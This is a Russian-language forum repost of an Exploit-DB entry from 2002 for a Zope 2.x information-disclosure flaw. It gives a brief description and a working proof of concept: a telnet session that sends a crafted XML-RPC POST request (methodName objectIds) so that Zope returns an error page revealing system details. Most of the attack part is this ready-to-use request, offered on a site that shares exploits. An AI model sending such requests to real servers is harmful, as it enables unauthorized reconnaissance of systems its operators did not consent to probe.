Exploit Zope 2.x - Incorrect XML-RPC Request Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21870
Проверка EDB
  1. Пройдено
Автор
ROSSEN RAYKOV
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
null
Дата публикации
2002-09-26
Код:
source: https://www.securityfocus.com/bid/5806/info

A vulnerability has been reported for Zope 2.5.1 and earlier. Reportedly, Zope does not handle XML-RPC requests properly. Specially crafted XML-RPC requests may cause Zope to respond to a request with an error page with system specific details.

telnet localhost 8080
POST /Documentation/comp_tut HTTP/1.0
Host: localhost
Content-Type: text/xml
Content-length: 93

<?xml version="1.0"?>
<methodCall>
<methodName>objectIds</methodName>
<params/>
</methodCall>
 
Источник
www.exploit-db.com

Похожие темы